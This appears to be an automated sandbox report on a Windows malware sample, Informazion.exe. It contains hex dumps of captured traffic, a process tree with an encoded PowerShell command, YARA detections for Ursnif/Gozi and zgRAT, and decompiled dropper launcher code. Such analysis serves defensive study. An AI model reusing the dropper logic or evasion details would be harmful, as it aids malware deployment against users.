2023-01-12 11:11:41 UTC	640	IN	Data Raw: a5 7d 4d f0 3a 54 ae c2 e3 c2 8b 95 2d 7f fb c4 18 0d 40 1b e5 3e 7a a1 cb e7 64 a3 ba ee 89 23 65 86 19 f9 be f6 cf be 41 b2 6b 3e ad f2 e3 04 31 aa 14 bf 39 20 22 70 8e 0f c3 e6 5a 1a 1d e5 f0 7c aa 1c da ca 30 cc c4 3a 9a 27 81 a9 54 ca 17 e8 98 61 a8 1c cb e6 e8 e0 cb 24 2b 6c a5 b4 da d1 c2 16 4d 21 58 91 4c 62 aa bf ad e6 34 2a 2b 5a ae b2 25 b7 81 e8 bd 00 84 25 2f c6 fa 54 35 da fe b9 76 49 72 92 ec e9 db b2 c6 b8 d1 f4 72 8d 40 36 91 ab 5a 20 3e c8 fd 8c ef da 5c 20 74 5d 1f 1c 69 5c b2 fb 92 d9 67 5e 37 a7 32 b2 eb 75 4a 39 db 63 ea d2 c5 34 e0 b7 ec f1 ae d1 ae bf cd 65 34 2f fc 43 66 d1 b6 d9 4a b0 c4 24 ad e9 ca 4e 3a aa 33 e3 4f f1 ad fd 3a 14 1c 83 f1 02 f3 9c fb eb b0 cf 3a 58 0b ec 7b 9a 30 4d ca d6 00 21 6d 46 d5 8b 10 3e 02 df 12 37 d1 Data Ascii: }M:T-@>zd#eAk>19 "pZ\|0:'Ta$+lM!XLb4*+Z%%/T5vIrr@6Z >\ t]i\g^72uJ9c4e4/CfJ$N:3O::X{0M!mF>7
2023-01-12 11:11:41 UTC	656	IN	Data Raw: 1b 58 31 06 d0 6f 3e 88 1b ec df f7 fc 5c 4d 69 b1 7c 00 08 9c 2b 2a da de 96 89 ac d9 e2 09 4b 6b 5b ba 2f 02 dc 8a 11 de ae 36 1f 68 a6 12 77 7b 8b 86 47 b5 13 2f 41 b8 55 94 67 bf b7 3a 2d a6 7f 4b 81 85 c6 e0 7d 17 bf 0f 85 e8 67 28 c5 c9 90 74 89 43 b3 ca a2 a0 c0 13 27 60 43 0b 5c 9c 4a 6a 02 ae c5 02 76 c0 31 6d 8b d6 de 64 9b d5 01 43 8b 6a 27 1a e1 17 bc 3e c5 61 91 21 48 1c 74 b0 41 bd 37 e0 b3 e9 99 ee 59 bc f3 25 10 9a 88 67 5d 6d d8 ac 6a 12 f0 c0 28 4b f7 9d 95 62 ed 70 fc 59 84 fa 20 ea 69 d0 a7 7a a6 62 f3 6f f0 7c b1 ce fb c6 f9 97 d2 ae ad 42 cb 4c b0 29 a2 c2 38 50 bf 99 55 c9 2e c4 17 f3 ae 02 58 32 a8 ee b1 c5 a4 9b d2 b6 f8 4e 9e a7 6e a6 1b 73 1a 59 03 77 cc b6 45 11 14 be f1 e7 54 da 55 29 93 d9 a4 97 4a a6 6b e4 bf a1 8d 5e 41 5b Data Ascii: X1o>\Mi\|+*Kk[/6hw{G/AUg:-K}g(tC'`C\Jjv1mdCj'>a!HtA7Y%g]mj(KbpY izbo\|BL)8PU.X2NnsYwETU)Jk^A[
2023-01-12 11:11:41 UTC	672	IN	Data Raw: 88 79 75 50 49 d0 67 b4 e2 11 92 40 1d 20 af 9e 73 e3 dc ca 1d 9f b1 62 e7 a1 7a 48 62 88 13 99 d4 cc 22 40 09 d3 38 e1 47 c9 1a 5c 00 9c ee cc 0c 45 02 f6 d5 be b0 cd 76 a8 8a 77 b5 58 b7 f9 3b 89 b8 cd 7c 01 ef ea 72 c4 d5 c7 ef 39 d0 51 f7 e4 72 6b af 74 32 ad c9 76 31 ae 39 36 b8 8f 7a b0 01 82 70 28 da 3e 0b b3 5b 68 55 39 8f 76 31 50 7a f8 4a a8 27 94 18 fb 96 63 d2 fb 0a cd d2 de f0 77 f9 ea 7a 12 63 9b 10 2a 32 5c 93 ae ee 3c 33 61 2a 89 23 04 99 eb 74 22 15 91 46 88 15 fd 94 55 a1 bc b1 92 16 5c 4b 33 77 15 96 93 e0 00 bf 95 7c 65 3c 20 6a 59 9f 3d 5d ba 53 64 9c 72 34 e8 20 f6 4b e1 9b f9 68 80 11 b3 8a 2d b2 73 81 88 a1 fb dc 3a 89 6b 4b 86 df 41 5b 92 95 6a 5f d6 9a 73 0f d4 0d 6e f7 5a 4d 3f 50 cf e4 82 4a 5e 3d b0 66 d3 70 40 65 bb 9e 66 32 Data Ascii: yuPIg@ sbzHb"@8G\EvwX;\|r9Qrkt2v196zp(>[hU9v1PzJ'cwzc2\<3a#t"FU\K3w\|e< jY=]Sdr4 Kh-s:kKA[j_snZM?PJ^=fp@ef2
2023-01-12 11:11:41 UTC	688	IN	Data Raw: 81 41 30 45 fd 7f fb 8b dc 49 f5 ad d7 1d 9e 69 65 c3 a0 62 b3 71 f0 6b b6 59 ff 94 98 59 39 92 1b 0c de 3f e4 c1 eb 90 c0 4d d8 ea 84 b2 50 99 21 53 b0 85 fa a8 c0 49 f2 a2 74 b2 9b db 90 94 eb 42 2a d1 51 90 01 3a 6d 4f 3e b7 be 0e c6 ee de 16 5f cf 57 35 9d 05 fe ba f1 bb de 3b aa e9 46 f9 fb 4f 39 3b 1a 7a a3 a9 cf 77 42 ed a3 2c c6 db 7d 7f 0b ff ca 4d d2 83 b6 14 be cb 19 44 96 03 c4 11 ac 19 27 c8 20 3e 16 81 61 d1 cc cf 48 60 27 ef 2b ba a8 6a 61 83 5d de 91 68 ed 9b 98 ee 1a 02 93 4b 94 08 2d 4b 5e ae 2e 52 11 c1 8f aa 89 24 ed 30 6c 9d 20 12 09 7a c6 5b a9 db 45 5c 01 5a 59 79 f1 9b 5c 54 06 99 12 f9 ac 26 56 99 99 3c 01 cc d6 93 ac af 55 f3 b5 6e ce 2e 19 77 5f c4 ff ad 58 40 7e 4e 4f 7d fd 76 d0 87 e5 6d f8 b6 5e e8 7c 43 36 af 62 ab df 1e 53 Data Ascii: A0EIiebqkYY9?MP!SItB*Q:mO>_W5;FO9;zwB,}MD' >aH`'+ja]hK-K^.R$0l z[E\ZYy\T&V<Un.w_X@~NO}vm^\|C6bS
2023-01-12 11:11:41 UTC	704	IN	Data Raw: e5 12 93 73 c9 38 10 00 20 4a 7b 6b da 16 56 29 03 fa d0 00 f3 31 3e 50 ab 97 53 c2 4c 81 48 60 2e 39 a9 b1 69 44 9f c9 23 5c 0d d7 c7 6c 60 95 57 22 03 e1 fa 32 ea 69 86 66 ef 3f 07 89 bd 61 d1 45 cf 42 ad 30 0f 5d 4f 98 43 b5 d4 b8 95 f3 9f b6 37 bb 88 66 b8 fc b0 a8 94 d5 db a9 6c aa f8 da 0b 54 12 42 12 26 fa f0 ac 31 5a 74 10 60 7c 25 99 50 b6 88 5c be e4 e5 2c 5d 30 bf a8 60 bb 7c 8c 84 a7 8d 26 25 fa 8c 23 70 1f 01 da f2 ee 66 1e 5b ba 3e ce 8d 35 a1 81 52 d7 34 00 14 a0 de 39 98 bf 92 47 56 0a 2a fb cb 75 67 e3 60 5d 31 66 96 49 cc 0d 9a 8d 04 6a 54 b2 c4 bb 14 1b 2c a5 f1 cf 58 93 be 8b d7 13 13 85 f7 68 e5 42 fe 49 49 c1 8e 06 19 26 ad a8 3b 90 98 92 8b c0 a1 85 92 84 72 33 9b 5e 79 fe 66 65 32 10 3e 5f 36 a6 e5 47 05 da f8 3a 9b 15 3a 88 83 9c Data Ascii: s8 J{kV)1>PSLH`.9iD#\l`W"2if?aEB0]OC7flTB&1Zt`\|%P\,]0`\|&%#pf[>5R49GV*ug`]1fIjT,XhBII&;r3^yfe2>_6G::
2023-01-12 11:11:41 UTC	720	IN	Data Raw: d9 6a d9 d4 e3 13 19 f0 0d c0 ed 72 dd fe 5b 3f 14 8f 89 f3 22 2d 1a 28 3f 92 d9 2c a7 28 6c ab 55 b2 51 76 fc 58 ef d9 ef 8c d3 78 fe 28 1e d1 e6 61 30 a9 e2 29 58 c7 7b 38 ce 4e 0b c1 26 a1 d7 0b bf 1f ff 06 84 64 fa 92 6a af 1d b8 ab 0e d0 95 3f 1a 41 5c c5 d3 7c cd 47 09 fd f5 d8 c0 5d 25 4a 0d 23 90 2e f8 b1 fe b4 ff 06 e4 5c 5e 3d 6d 50 31 b5 1e 90 e3 02 2b 27 9e d3 4f 5e d8 2f ab dd 9e 24 a6 61 82 15 52 dc e1 70 49 d3 78 f4 96 7f e1 15 1f 93 b7 7a 7a 02 96 cb a6 ed 32 9c 3a e2 f5 b2 5a 8b de cd 61 f6 a1 12 b2 67 5d bf 2d 63 b0 ed 15 8e 3b e3 7a b0 49 cd ef 6a 0c b9 1c 01 0b d3 47 55 42 13 6c af 8f 5c 2d d3 ba 52 cf 1e 3e 8a fb 64 04 52 66 d6 fa 21 03 b0 70 7f a3 e4 a1 37 16 83 91 7e 14 c8 28 e0 68 27 fe 7c 8f 6a 0a 77 d2 ad 24 1b d9 49 2c 7a 1d cc Data Ascii: jr[?"-(?,(lUQvXx(a0)X{8N&dj?A\\|G]%J#.\^=mP1+'O^/$aRpIxzz2:Zag]-c;zIjGUBl\-R>dRf!p7~(h'\|jw$I,z
2023-01-12 11:11:41 UTC	736	IN	Data Raw: 89 f7 72 e7 06 80 b8 eb 3e ee 02 a8 d1 e4 e9 02 bb 79 13 8b b2 b6 db 3a 75 ec 8f e2 73 d4 f2 dc 18 33 d5 d3 9e d9 86 a8 e9 ef ba df 52 04 4e 81 8d 9e b1 03 ec 76 38 75 bc 3f cb a7 1e a5 02 17 fb 83 95 5a f0 6c d8 9f 09 26 17 e4 9a 49 f3 e1 57 4f 9a 4a f7 f1 f2 32 ad ed 69 0d b9 68 e0 83 95 a3 18 5b 3e 50 b6 5c b6 87 c3 2b 5e 37 38 4d b8 80 c7 4b 44 61 02 f4 b3 86 17 55 52 06 a4 58 5d 58 98 bf 23 36 f0 70 fb 19 dc ec 52 0f 8a 2e e3 e6 72 da f0 e7 3a d3 8d 20 e2 27 56 cf 81 98 9f 24 57 99 de 88 d7 38 43 72 47 18 a4 3d 7d 77 1a 0c 7a 6d 18 5a 32 33 3f 32 20 5c 3b fc a8 d9 bc 5f b3 cd ed e4 66 c0 b7 7a eb 42 c4 dd e3 0c 1c cd 66 71 8b c5 29 c5 8b 80 d8 07 bf 18 77 ea c7 0c 1c be 57 97 62 1b e9 43 bf 9a 2d a7 39 70 7a b6 f9 fe 25 fe 0d c5 05 f9 6e 10 5e 87 07 Data Ascii: r>y:us3RNv8u?Zl&IWOJ2ih[>P\+^78MKDaURX]X#6pR.r: 'V$W8CrG=}wzmZ23?2 \;_fzBfq)wWbC-9pz%n^
2023-01-12 11:11:41 UTC	752	IN	Data Raw: ee 7a 4d 72 18 81 9b 3f 3a 6e d2 5e 5e c5 6a 5c 12 60 a2 06 b1 ff 6b ec fc 11 cf c5 6e 62 64 00 d1 da 49 a3 1c 46 36 a6 9a 72 ae 06 e7 06 99 28 36 87 cf ac ad b1 af 92 43 16 77 16 ef 76 27 87 16 a9 55 8d 1b 02 0c 18 9d 79 d2 e1 d4 f2 2a b5 4a fc 0e 80 64 d1 35 06 af e4 2f 9b a4 41 f3 e4 b5 d3 61 5c ae 44 99 4a 89 7c 28 17 f7 f2 2a 9f 7e 6a a0 5b c3 0a 72 fa 49 2e b5 55 d9 a5 52 f5 29 5b 23 d0 eb 8c 06 ce fb db 63 78 9b 15 d3 71 af ce ee dc 4a 54 bc 13 88 fc b3 ba 95 cc 9b 66 af 9c 3e a8 e1 4d 83 fa 94 6b 38 d5 d0 5f 56 6d 1f 4f fc 70 c6 19 d2 bd c1 74 45 65 50 91 fe b1 6b a0 78 a5 e5 23 c0 72 dd c6 68 05 de 5e 91 1a 17 1f 78 a2 ff f7 ba aa 87 bc a1 38 1c f9 f1 ee 85 12 d0 37 86 56 11 6f 04 8a ab f4 fc 8a b1 a9 16 6d d8 7d e3 27 96 c3 32 07 2f d8 40 9b 81 Data Ascii: zMr?:n^^j\`knbdIF6r(6Cwv'UyJd5/Aa\DJ\|(~j[rI.UR)[#cxqJTf>Mk8_VmOptEePkx#rh^x87Vom}'2/@
2023-01-12 11:11:41 UTC	768	IN	Data Raw: 93 e9 5c bd af f1 da 7f 7b 26 37 c8 dd c1 db a7 99 47 32 98 a4 eb 56 b9 39 03 df 6c 27 fc 53 05 d3 5e 3f 2f 52 6c a0 ac a6 99 1a 08 af 48 07 3c 81 c6 af 98 e2 bf c7 14 f7 1b 5d 55 c7 23 d6 86 7c 47 02 98 54 1f 7f 89 ce 47 d4 64 03 13 a8 3a b4 9f ec 49 dd 26 2d 68 b9 63 60 e3 62 3f 2d bc 07 b1 9d 24 68 99 a4 5e ac 78 dc ff 97 09 90 b4 6a d5 c4 36 da 53 29 76 21 99 5e 8c 48 d5 37 29 e8 19 4d 56 31 bc 96 b5 21 95 d1 6c e4 f6 a8 ba ea c8 22 88 e8 bf bf 2f 1d 14 bc 42 a1 02 dd 9c 5b ae ca 6d 5e 8b 2d 85 7f c2 be 96 ec 7d c9 8c 37 d6 bd 89 19 7b a9 79 a2 5c 81 38 14 29 f8 00 cd 98 bd 62 e9 02 95 e1 75 bf 7f 1a 9b 87 58 43 a9 0c f8 b6 a9 bd 95 31 f2 64 29 66 bc b6 da be 7c 80 15 5b 6d e9 42 49 90 90 12 a7 7e b1 d5 df 64 97 7a d4 99 4b c9 fe ac fb 7a ef 60 bb 06 Data Ascii: \{&7G2V9l'S^?/RlH<]U#\|GTGd:I&-hc`b?-$h^xj6S)v!^H7)MV1!l"/B[m^-}7{y\8)buXC1d)f\|[mBI~dzKz`
2023-01-12 11:11:41 UTC	784	IN	Data Raw: 96 88 5f c1 3f 52 19 60 52 d2 29 98 15 8d ac 1c 98 9b e1 27 d1 9e 16 bd a4 d5 e3 e7 4f 13 88 9b 2a 11 5f 52 ed 14 61 3f 69 0f 0f d0 e5 07 03 3b 3e a9 2e 44 a6 c8 d9 6d ca 3d 98 78 4b 17 5e b6 7d fe be 42 0b ea 6b 02 fa 47 b5 59 51 bc 7e c8 a5 a7 f7 bd 88 af 1e d5 11 ad 2f f7 4d c8 7b e0 4e 62 63 5a 48 04 f0 74 4e 93 c5 1c ab 78 23 18 ad 96 cf 1e 46 b4 09 cf 15 eb a1 70 1e e9 b1 8f b8 c2 b0 e4 d1 fe 84 a4 25 75 db 90 9a cb ec 42 72 6d 87 86 49 26 ef 34 c1 46 6e 91 13 d1 06 f4 31 80 c2 14 7c 78 c8 7f 40 07 bb 7b 23 2b 17 e8 20 77 37 af 54 64 02 2c c2 2d 3e 9a d5 76 7f 72 ae 2d 2e 7e 6a 2b d1 68 dc 3c fa 60 c9 e4 5a 2b c2 8e 49 d9 18 3c 17 11 85 3c bf 7a 0b 27 bd 65 47 dd 01 e4 07 0e 29 0f 62 16 97 5e 8e 9c 6f 1d 12 dc e5 b2 f5 05 ea e9 2f 72 ca cc dd 23 0e Data Ascii: _?R`R)'O*_Ra?i;>.Dm=xK^}BkGYQ~/M{NbcZHtNx#Fp%uBrmI&4Fn1\|x@{#+ w7Td,->vr-.~j+h<`Z+I<<z'eG)b^o/r#
2023-01-12 11:11:41 UTC	800	IN	Data Raw: 07 17 71 7d 71 74 75 6f 5a 2f 0c 1f 03 04 1c 1f 2d 6b 7e 77 75 72 6d 65 73 6e 77 6e 69 74 75 66 76 43 64 60 6a 6a 75 68 b6 e2 c1 7e 6f 72 64 6d 73 6e 77 68 73 74 75 66 75 66 62 79 6a 6a 75 6b 54 62 71 77 74 72 64 6d 73 6e 77 68 71 74 75 66 75 66 62 79 6b 6a 75 6b 55 62 70 76 74 76 61 6d 73 6e 50 3b 08 07 01 03 1a 48 25 15 05 08 14 07 3d 18 10 03 1c 1d 0a 43 37 0f 03 0d 25 1d 18 03 31 09 10 14 0b 1e 3c 05 32 0d 5a 77 75 72 62 00 2c 00 16 05 14 78 14 0b 33 03 11 10 0d 04 14 1f 3b 10 7d 07 18 36 01 1e 1a 09 19 09 05 1b 07 6b 13 07 16 1c 39 0f 05 0a 26 03 05 18 07 65 03 08 1d 0b 05 09 1d 27 1d 09 05 12 36 10 07 0f 25 0a 20 16 14 05 1b 64 03 08 1d 0b 05 09 1d 38 1a 08 10 32 0b 14 0f 3a 14 1f 20 07 03 19 78 06 0d 00 16 3d 12 18 10 06 14 12 18 14 6d 14 05 04 01 Data Ascii: q}qtuoZ/-k~wurmesnwnitufvCd`jjuh~ordmsnwhstufufbyjjukTbqwtrdmsnwhqtufufbykjukUbpvtvamsnP;H%=C7%1<2Zwurb,x3;}6k9&e'6% d82: x=m

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: Informazion.exePID: 1248, Parent PID: 3528

General

Target ID:	0
Start time:	12:11:02
Start date:	12/01/2023
Path:	C:\Users\user\Desktop\Informazion.exe
Wow64 process (32bit):	false
Commandline:	C:\Users\user\Desktop\Informazion.exe
Imagebase:	0x7ff64c510000
File size:	774656 bytes
MD5 hash:	EF4C4F0B7A8CD7B8BD2D2DC6E5982043
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: maintainabovl.exePID: 5976, Parent PID: 1248

General

Target ID:	1
Start time:	12:11:31
Start date:	12/01/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Imagebase:	0x840000
File size:	380008704 bytes
MD5 hash:	B405B1565194722F9457002C4EDACBAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Yara matches:	Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.501526804.0000000003FD4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.499268077.0000000002E56000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002D89000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.508878561.000000000C370000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002DFF000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_zgRAT_1, Description: Yara detected zgRAT, Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security Rule: MALWARE_Win_zgRAT, Description: Detects zgRAT, Source: 00000001.00000002.508145509.000000000C0E0000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen Rule: JoeSecurity_CosturaAssemblyLoader, Description: Yara detected Costura Assembly Loader, Source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000001.00000002.499268077.0000000002CB6000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: rundll32.exePID: 4492, Parent PID: 3528

General

Target ID:	2
Start time:	12:11:42
Start date:	12/01/2023
Path:	C:\Windows\System32\rundll32.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\rundll32.exe" C:\Windows\system32\advpack.dll,DelNodeRunDLL32 "C:\Users\user\AppData\Local\Temp\IXP000.TMP\
Imagebase:	0x7ff729970000
File size:	69632 bytes
MD5 hash:	73C519F050C20580F8A62C849D49215A
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: powershell.exePID: 5272, Parent PID: 5976

General

Target ID:	3
Start time:	12:11:49
Start date:	12/01/2023
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ENC cwB0AGEAcgB0AC0AcwBsAGUAZQBwACAALQBzAGUAYwBvAG4AZABzACAAMwA4AA==
Imagebase:	0x130000
File size:	430592 bytes
MD5 hash:	DBA3E6449E97D4E3DF64527EF7012A10
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	.Net C# or VB.NET
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 492, Parent PID: 5272

General

Target ID:	4
Start time:	12:11:49
Start date:	12/01/2023
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7c72c0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: maintainabovl.exePID: 5732, Parent PID: 5976

General

Target ID:	7
Start time:	12:12:36
Start date:	12/01/2023
Path:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\IXP000.TMP\maintainabovl.exe
Imagebase:	0x810000
File size:	380008704 bytes
MD5 hash:	B405B1565194722F9457002C4EDACBAE
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000007.00000003.668899027.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000007.00000002.821137640.0000000001B08000.00000004.00000020.00020000.00000000.sdmp, Author: unknown Rule: JoeSecurity_Ursnif_1, Description: Yara detected Ursnif, Source: 00000007.00000002.819938819.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: Informazion.exePID: 1248, Parent PID: 3528COMMON

Execution Graph

Execution Coverage:	27.6%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	41.9%
Total number of Nodes:	924
Total number of Limit Nodes:	45

Callgraph

Executed
Not Executed
Opacity -> Relevance
Disassembly available

Executed Functions

Function 00007FF64C5140C4 Relevance: 54.6, APIs: 17, Strings: 14, Instructions: 371
libraryloaderCOMMONCrypto

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 46%

			E00007FF67FF64C5140C4(intOrPtr __esi, long long __rbx, long long __rdi, signed long long __rsi) {
				void* __rbp;
				intOrPtr _t78;
				signed char _t80;
				char _t86;
				void* _t89;
				signed char _t93;
				signed char _t94;
				intOrPtr _t95;
				intOrPtr _t96;
				void* _t98;
				short _t104;
				intOrPtr _t105;
				signed int _t111;
				intOrPtr _t119;
				void* _t120;
				void* _t122;
				char _t136;
				void* _t140;
				void* _t144;
				void* _t145;
				void* _t148;
				void* _t153;
				void* _t163;
				signed long long _t164;
				long long _t171;
				char* _t186;
				void* _t187;
				void* _t201;
				signed long long _t210;
				struct HINSTANCE__* _t213;
				void* _t214;
				void* _t216;
				signed long long _t217;
				void* _t224;
				void* _t226;
				struct HINSTANCE__* _t228;
				int _t230;
				int _t232;
				void* _t234;

				_t210 = __rsi;
				_t176 = __rbx;
				_t119 = __esi;
				_t163 = _t216;
				 *((long long*)(_t163 + 8)) = __rbx;
				 *((long long*)(_t163 + 0x10)) = __rsi;
				 *((long long*)(_t163 + 0x18)) = __rdi;
				_t214 = _t163 - 0x488;
				_t217 = _t216 - 0x560;
				_t164 =  *0x4c51c008; // 0xdeba5460e397
				 *(_t214 + 0x450) = _t164 ^ _t217;
				r13d = 0;
				_t120 =  *0x4c51cd08 - r13d; // 0x0
				r15d = r13d;
				r12d = r13d;
				 *0x4c51d544 = r13d;
				_t6 = _t230 + 3; // 0x3
				_t104 = _t6;
				if (_t120 != 0) goto 0x4c514139;
				_t7 = _t230 + 4; // 0x4
				r8d = _t7;
				if (E00007FF67FF64C515050(_t164 ^ _t217, __rbx, "REBOOT", 0x4c51de5c, __rsi, _t214) - 1 - _t104 > 0) goto 0x4c514254;
				r14d = r13d;
				 *((intOrPtr*)(_t217 + 0x30)) = r13d;
				r8d = 0x7ff64c51dec0;
				memset(_t234, _t232, _t230);
				_t122 =  *0x4c51cf22 - r13b; // 0x0
				 *((intOrPtr*)(_t214 - 0x80)) = 0x68;
				if (_t122 != 0) goto 0x4c514282;
				r8d = 4;
				if (E00007FF67FF64C515050(_t164 ^ _t217, _t176, "SHOWWINDOW", _t217 + 0x40, _t210 | 0xffffffff, _t214) - 1 - _t104 > 0) goto 0x4c514254;
				_t78 =  *((intOrPtr*)(_t217 + 0x40));
				if (_t78 != 1) goto 0x4c51419d;
				 *((intOrPtr*)(_t214 - 0x40)) = r13w;
				goto 0x4c5141b5;
				if (_t78 != 2) goto 0x4c5141ad;
				 *((short*)(_t214 - 0x40)) = 6;
				goto 0x4c5141b5;
				if (6 != _t104) goto 0x4c5141b8;
				 *((short*)(_t214 - 0x40)) = _t104;
				 *((intOrPtr*)(_t214 - 0x44)) = 1;
				if (r14d != 0) goto 0x4c5142c5;
				_t80 =  *0x4c51cd18 & 0x0000ffff;
				if (_t80 == 0) goto 0x4c514231;
				if ((dil & _t80) == 0) goto 0x4c5141db;
				goto 0x4c5141ea;
				if ((_t80 & 0x00000002) == 0) goto 0x4c5144ee;
				r8d = 0x104;
				if (E00007FF67FF64C515050(_t164 ^ _t217, _t176, "USRQCMD", _t214 - 0x10, _t210 | 0xffffffff, _t214) == 0) goto 0x4c514254;
				 *((intOrPtr*)(_t217 + 0x28)) = __esi;
				r9d = __esi;
				 *((long long*)(_t217 + 0x20)) = "<None>";
				CompareStringA(??, ??, ??, ??, ??, ??);
				r15d =  !=  ? 1 : r15d;
				if (r15d != 0) goto 0x4c514328;
				r8d = 0x104;
				_t201 = _t214 - 0x10;
				if (E00007FF67FF64C515050("<None>", _t176, "RUNPROGRAM", _t201, _t210 | 0xffffffff, _t214) != 0) goto 0x4c5142c5;
				 *((intOrPtr*)(_t217 + 0x28)) = r13d;
				r9d = 0;
				r8d = 0;
				 *((intOrPtr*)(_t217 + 0x20)) = 0x10;
				E00007FF67FF64C514DCC("RUNPROGRAM", _t214 - 0x10, _t224, _t226);
				 *0x4c51d544 = 0x80070714;
				goto 0x4c5144ee;
				_t186 = _t214 - 0x10;
				_t31 = _t201 + 0x7ffffefa; // 0x7ffffffe
				if (_t31 == 0) goto 0x4c5142b7;
				_t86 =  *((intOrPtr*)(0x4c51cf22 - _t214 - 0x10 + _t186));
				_t136 = _t86;
				if (_t136 == 0) goto 0x4c5142b7;
				 *_t186 = _t86;
				_t187 = _t186 + __rdi;
				if (_t136 != 0) goto 0x4c514299;
				_t170 =  !=  ? _t187 : _t187 - 1;
				 *((intOrPtr*)( !=  ? _t187 : _t187 - 1)) = r13b;
				if (r14d != 1) goto 0x4c514328;
				r8d = 0x104;
				if (E00007FF67FF64C515050( !=  ? _t187 : _t187 - 1, _t176, "POSTRUNPROGRAM", _t214 - 0x10, _t210 | 0xffffffff, _t214) == 0) goto 0x4c514254;
				_t140 =  *0x4c51cf22 - r13b; // 0x0
				if (_t140 != 0) goto 0x4c5145d8;
				_t171 = "<None>";
				 *((intOrPtr*)(_t217 + 0x28)) = _t119;
				r9d = _t119;
				 *((long long*)(_t217 + 0x20)) = _t171;
				if (CompareStringA(??, ??, ??, ??, ??, ??) == 2) goto 0x4c5145d8;
				_t89 = E00007FF67FF64C511684(_t104, _t176, _t214 - 0x10, _t214 - 0x10, _t217 + 0x38, _t217 + 0x30); // executed
				if (_t89 == 0) goto 0x4c5144ee;
				_t105 =  *((intOrPtr*)(_t217 + 0x30));
				if (r12d != 0) goto 0x4c51436a;
				_t144 =  *0x4c51de78 - 1; // 0x3
				if (_t144 == 0) goto 0x4c51436a;
				_t145 =  *0x4c51cd00 - r13d; // 0x0
				if (_t145 == 0) goto 0x4c51436a;
				if (_t105 != 0) goto 0x4c514372;
				r12d = 1; // executed
				E00007FF67FF64C511D28(_t176, __rdi, _t210 | 0xffffffff, _t217 + 0x30); // executed
				if (_t105 == 0) goto 0x4c514493;
				_t148 =  *0x4c51c1a8 - r13d; // 0x1
				if (_t148 == 0) goto 0x4c514599;
				if (_t105 == 0) goto 0x4c514493;
				if (( *0x4c51de64 & 0x00000004) == 0) goto 0x4c514493;
				E00007FF67FF64C5179F0(_t214 - 0x10, _t217 + 0x38);
				if (_t171 == 0) goto 0x4c514574;
				GetProcAddress(_t228);
				if (_t171 == 0) goto 0x4c514521;
				_t153 =  *0x4c51cd10 - r13d; // 0x0
				 *((long long*)(_t217 + 0x50)) = 0x4c51d578;
